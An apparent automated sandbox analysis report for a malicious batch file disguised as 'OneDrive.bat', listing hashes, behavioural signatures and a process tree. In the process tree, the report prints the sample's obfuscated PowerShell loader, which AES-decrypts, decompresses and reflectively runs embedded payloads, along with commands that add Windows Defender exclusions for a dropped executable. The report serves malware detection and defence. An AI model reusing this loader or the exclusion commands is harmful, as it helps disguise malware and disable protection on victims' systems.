Analysis
-
max time kernel
41s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02/09/2024, 07:52
Static task
static1
Behavioral task
behavioral1
Sample
OneDrive.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
OneDrive.bat
Resource
win10v2004-20240802-en
General
-
Target
OneDrive.bat
-
Size
1.2MB
-
MD5
910b3bf392ceebba680ed467b27950cb
-
SHA1
d1fa89ff6a2c469aa26378371fd52edf48a9456b
-
SHA256
4bff541ef6e29f41b8af276f4e7fe7ba4c1f80dda1fee018d5fbe5e406198642
-
SHA512
52fe37a230696471cf4c6d8197823d7d9c3662793d4fd0396b63d7494454372ee863acc0c77d4ae5e5b7185ea407ddbe5d31438aa25a6865d8caa00e486935aa
-
SSDEEP
24576:vh6NHlW4OW3NioVcDfQcDkH4Z212kKZgEqE0q:vk9Boo25kmgqn
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 14 4608 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5112 powershell.exe 4456 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1644 Windows Session Manager.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\O: svchost.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File created C:\Windows\System32\Windows Session Manager.exe powershell.exe File opened for modification C:\Windows\System32\Windows Session Manager.exe powershell.exe File opened for modification C:\Windows\System32\Tasks\Windows Session Manager svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2196 timeout.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018800FEEABDE2D" svchost.exe -
Modifies registry class 7 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133697371480486507" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133697371550867143" svchost.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 5112 powershell.exe 5112 powershell.exe 5112 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4456 powershell.exe 4456 powershell.exe 4456 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4208 taskmgr.exe 4208 taskmgr.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4608 powershell.exe 4608 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3548 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4608 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe Token: SeSystemtimePrivilege 2240 svchost.exe Token: SeBackupPrivilege 2240 svchost.exe Token: SeRestorePrivilege 2240 svchost.exe Token: SeShutdownPrivilege 2240 svchost.exe Token: SeSystemEnvironmentPrivilege 2240 svchost.exe Token: SeUndockPrivilege 2240 svchost.exe Token: SeManageVolumePrivilege 2240 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe Token: SeSystemtimePrivilege 2240 svchost.exe Token: SeBackupPrivilege 2240 svchost.exe Token: SeRestorePrivilege 2240 svchost.exe Token: SeShutdownPrivilege 2240 svchost.exe Token: SeSystemEnvironmentPrivilege 2240 svchost.exe Token: SeUndockPrivilege 2240 svchost.exe Token: SeManageVolumePrivilege 2240 svchost.exe Token: SeAuditPrivilege 2804 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe Token: SeSystemtimePrivilege 2240 svchost.exe Token: SeBackupPrivilege 2240 svchost.exe Token: SeRestorePrivilege 2240 svchost.exe Token: SeShutdownPrivilege 2240 svchost.exe Token: SeSystemEnvironmentPrivilege 2240 svchost.exe Token: SeUndockPrivilege 2240 svchost.exe Token: SeManageVolumePrivilege 2240 svchost.exe Token: SeAuditPrivilege 2804 svchost.exe Token: SeShutdownPrivilege 4760 svchost.exe Token: SeCreatePagefilePrivilege 4760 svchost.exe Token: SeShutdownPrivilege 4760 svchost.exe Token: SeCreatePagefilePrivilege 4760 svchost.exe Token: SeShutdownPrivilege 4760 svchost.exe Token: SeCreatePagefilePrivilege 4760 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe Token: SeBackupPrivilege 2240 svchost.exe Token: SeRestorePrivilege 2240 svchost.exe Token: SeShutdownPrivilege 2240 svchost.exe Token: SeSystemEnvironmentPrivilege 2240 svchost.exe Token: SeManageVolumePrivilege 2240 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2240 svchost.exe Token: SeIncreaseQuotaPrivilege 2240 svchost.exe Token: SeSecurityPrivilege 2240 svchost.exe Token: SeTakeOwnershipPrivilege 2240 svchost.exe Token: SeLoadDriverPrivilege 2240 svchost.exe Token: SeSystemtimePrivilege 2240 svchost.exe Token: SeBackupPrivilege 2240 svchost.exe Token: SeRestorePrivilege 2240 svchost.exe Token: SeShutdownPrivilege 2240 svchost.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 3548 Explorer.EXE 3548 Explorer.EXE 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 3548 Explorer.EXE 3548 Explorer.EXE -
Suspicious use of SendNotifyMessage 59 IoCs
pid Process 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 4208 taskmgr.exe 3548 Explorer.EXE 3548 Explorer.EXE 3548 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4216 wrote to memory of 3152 4216 cmd.exe 87 PID 4216 wrote to memory of 3152 4216 cmd.exe 87 PID 4216 wrote to memory of 4608 4216 cmd.exe 88 PID 4216 wrote to memory of 4608 4216 cmd.exe 88 PID 4608 wrote to memory of 3548 4608 powershell.exe 56 PID 4608 wrote to memory of 2748 4608 powershell.exe 46 PID 4608 wrote to memory of 1564 4608 powershell.exe 27 PID 4608 wrote to memory of 1352 4608 powershell.exe 23 PID 4608 wrote to memory of 1548 4608 powershell.exe 26 PID 4608 wrote to memory of 1744 4608 powershell.exe 30 PID 4608 wrote to memory of 952 4608 powershell.exe 12 PID 4608 wrote to memory of 1148 4608 powershell.exe 19 PID 4608 wrote to memory of 2132 4608 powershell.exe 39 PID 4608 wrote to memory of 1136 4608 powershell.exe 18 PID 4608 wrote to memory of 2120 4608 powershell.exe 38 PID 4608 wrote to memory of 1720 4608 powershell.exe 36 PID 4608 wrote to memory of 1128 4608 powershell.exe 17 PID 4608 wrote to memory of 1312 4608 powershell.exe 22 PID 4608 wrote to memory of 2828 4608 powershell.exe 50 PID 4608 wrote to memory of 3672 4608 powershell.exe 57 PID 4608 wrote to memory of 4836 4608 powershell.exe 69 PID 4608 wrote to memory of 516 4608 powershell.exe 14 PID 4608 wrote to memory of 4444 4608 powershell.exe 66 PID 4608 wrote to memory of 1492 4608 powershell.exe 25 PID 4608 wrote to memory of 1688 4608 powershell.exe 29 PID 4608 wrote to memory of 2868 4608 powershell.exe 52 PID 4608 wrote to memory of 896 4608 powershell.exe 11 PID 4608 wrote to memory of 2668 4608 powershell.exe 72 PID 4608 wrote to memory of 1808 4608 powershell.exe 68 PID 4608 wrote to memory of 2860 4608 powershell.exe 51 PID 4608 wrote to memory of 1280 4608 powershell.exe 75 PID 4608 wrote to memory of 1672 4608 powershell.exe 28 PID 4608 wrote to memory of 2656 4608 powershell.exe 45 PID 4608 wrote to memory of 2260 4608 powershell.exe 41 PID 4608 wrote to memory of 1856 4608 powershell.exe 32 PID 4608 wrote to memory of 3428 4608 powershell.exe 55 PID 4608 wrote to memory of 1260 4608 powershell.exe 21 PID 4608 wrote to memory of 2240 4608 powershell.exe 40 PID 4608 wrote to memory of 2040 4608 powershell.exe 35 PID 4608 wrote to memory of 2428 4608 powershell.exe 42 PID 4608 wrote to memory of 1192 4608 powershell.exe 20 PID 4608 wrote to memory of 1036 4608 powershell.exe 16 PID 4608 wrote to memory of 2804 4608 powershell.exe 48 PID 4608 wrote to memory of 1028 4608 powershell.exe 15 PID 4608 wrote to memory of 1420 4608 powershell.exe 24 PID 4608 wrote to memory of 1972 4608 powershell.exe 33 PID 4608 wrote to memory of 2456 4608 powershell.exe 43 PID 4608 wrote to memory of 1980 4608 powershell.exe 34 PID 4608 wrote to memory of 796 4608 powershell.exe 10 PID 4608 wrote to memory of 1780 4608 powershell.exe 31 PID 4608 wrote to memory of 4220 4608 powershell.exe 65 PID 4608 wrote to memory of 4760 4608 powershell.exe 94 PID 796 wrote to memory of 4868 796 svchost.exe 95 PID 796 wrote to memory of 4868 796 svchost.exe 95 PID 4608 wrote to memory of 5112 4608 powershell.exe 98 PID 4608 wrote to memory of 5112 4608 powershell.exe 98 PID 4608 wrote to memory of 3172 4608 powershell.exe 97 PID 4608 wrote to memory of 4456 4608 powershell.exe 100 PID 4608 wrote to memory of 4456 4608 powershell.exe 100 PID 3548 wrote to memory of 4208 3548 Explorer.EXE 103 PID 3548 wrote to memory of 4208 3548 Explorer.EXE 103 PID 4608 wrote to memory of 4208 4608 powershell.exe 103 PID 796 wrote to memory of 1272 796 svchost.exe 105 PID 796 wrote to memory of 1272 796 svchost.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}2⤵PID:4868
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding2⤵PID:1272
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding2⤵PID:4904
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1128 -
C:\Windows\System32\Windows Session Manager.exe"C:\Windows\System32\Windows Session Manager.exe"2⤵
- Executes dropped EXE
PID:1644
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1136
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2860
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3428
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OneDrive.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Kiy4dTtQVnTUxCM/fvGg1uEjomL+PcfRR7GpolHUfsE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0e5UViEXi7i8B5psEUa4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Oxjbt=New-Object System.IO.MemoryStream(,$param_var); $Noype=New-Object System.IO.MemoryStream; $pFrye=New-Object System.IO.Compression.GZipStream($Oxjbt, [IO.Compression.CompressionMode]::Decompress); $pFrye.CopyTo($Noype); $pFrye.Dispose(); $Oxjbt.Dispose(); $Noype.Dispose(); $Noype.ToArray();}function execute_function($param_var,$param2_var){ $HKJTD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fAoDf=$HKJTD.EntryPoint; $fAoDf.Invoke($null, $param2_var);}$TOybY = 'C:\Users\Admin\AppData\Local\Temp\OneDrive.bat';$host.UI.RawUI.WindowTitle = $TOybY;$PbUhc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($TOybY).Split([Environment]::NewLine);foreach ($jFAXB in $PbUhc) { if ($jFAXB.StartsWith('nXXRksbZXAPhlqyxASOY')) { $BOAuy=$jFAXB.Substring(20); break; }}$payloads_var=[string[]]$BOAuy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Windows Session Manager.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Session Manager.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB1AC.tmp.bat""4⤵PID:992
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:2196
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4208
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4220
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4444
-
